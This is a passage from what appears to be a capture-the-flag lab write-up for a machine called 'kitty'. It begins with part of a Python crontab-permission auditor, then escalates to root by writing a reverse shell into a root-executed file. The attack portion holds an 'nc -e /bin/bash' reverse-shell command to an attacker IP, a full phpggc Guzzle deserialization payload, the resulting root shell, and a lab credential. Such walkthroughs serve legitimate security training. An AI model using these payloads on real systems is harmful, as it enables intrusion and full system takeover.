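    return jobs


def nonroot_writers(mode, owner, group):
    """List the principals other than root that hold a write bit."""
    writers = []
    if mode[2] == "w" and owner != "root":
        writers.append(f"user {owner}")
    if mode[5] == "w" and group != "root":
        writers.append(f"group {group}")
    if mode[8] == "w":
        writers.append("others")
    return writers


def live_lookup(directory):
    """Same tuple as PAGE_PERMS, read from the running system."""
    import grp
    import pwd
    try:
        st = os.stat(directory)
        return (stat.filemode(st.st_mode),
                pwd.getpwuid(st.st_uid).pw_name,
                grp.getgrgid(st.st_gid).gr_name)
    except (OSError, KeyError):
        return None


def audit(text, lookup):
    """Flag paths used by root jobs that a non-root principal can create or replace."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        executes_data = bool(SHELL_PIPE_RE.search(command))
        for path in sorted(set(PATH_RE.findall(command))):
            parent = posixpath.dirname(path)
            info = lookup(parent)
            if info is None:
                continue  # permissions unknown, nothing to report
            writers = nonroot_writers(*info)
            if writers:
                findings.append({"path": path, "dir": parent,
                                 "writers": writers,
                                 "executes_data": executes_data})
    return findings


if __name__ == "__main__":
    for finding in audit(CRONTAB, PAGE_PERMS.get):
        print(finding)
```

On a live host, read /etc/crontab and pass live_lookup instead of PAGE_PERMS.get. Any finding with executes_data set means root runs content that another account can supply, so either the directory must be root-only or the job must stop executing file contents.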

So use the deserialization bug to write a reverse shell into /usr/local/etc/newfile.txt.

root will then execute it every minute.

echo 'nc -e /bin/bash 192.168.60.100 4444' |base64 |tee a.txt
bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNjAuMTAwIDQ0NDQK
❯ ./phpggc -u --fast-destruct Guzzle/FW1 /usr/local/etc/newfile.txt /home/Pepster/hmv/phpggc/a.txt
a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7Bs%3A36%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A3%3A%7Bs%3A7%3A%22Expires%22%3Bi%3A1%3Bs%3A7%3A%22Discard%22%3Bb%3A0%3Bs%3A5%3A%22Value%22%3Bs%3A49%3A%22bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNjAuMTAwIDQ0NDQK%0A%22%3B%7D%7D%7Ds%3A39%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00strictMode%22%3BN%3Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A26%3A%22%2Fusr%2Flocal%2Fetc%2Fnewfile.txt%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7Di%3A7%3Bi%3A7%3B%7D

Send the payload again.

Listen on the port.

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from kitty-192.168.60.138-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/kitty~192.168.60.138_Linux_x86_64/2025_04_18-12_18_01-042.log 📜
──────────────────────────────────────────────────────────────────────────
root@kitty:~# id
uid=0(root) gid=0(root) groups=0(root)
root@kitty:~# cat root.txt
3f798f4e70a832c64e8f6f1462b04d0f

Afterword

Looking at the FastAPI code afterwards, the numbers turn out to be hard-coded.

if num == -1:
    return {"success":"Yay! You Found Login Credentials","Credentials":"nobody : 74k3!7345y"}
elif num == -2:
    return id_rsa
else:
    return { "Error": f"{num} is Wrong Number. Try Again!" }

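Also, the PHP scripts of the opencats site are executed by php-fpm behind nginx, and the pool configuration sets the owning user to power.

That is why the generated file belongs to power rather than to nginx's www-data.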

root@kitty:/usr/local/src/FastAPI# cat /etc/nginx/sites-available/opencats
server {
    listen 80;
    server_name thisisnotcatitisopencats.kitty.hmv;
    root /opt/opencats;
    index index.html index.htm index.php;
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/power.sock;
    }

}
root@kitty:/usr/local/src/FastAPI# cat /etc/php/7.3/fpm/pool.d/dyutidhara.conf
[power]
user = power
group = power
listen.owner = www-data
listen.group = www-data
pm = ondemand
pm.max_children = 1
listen = /run/php/power.sock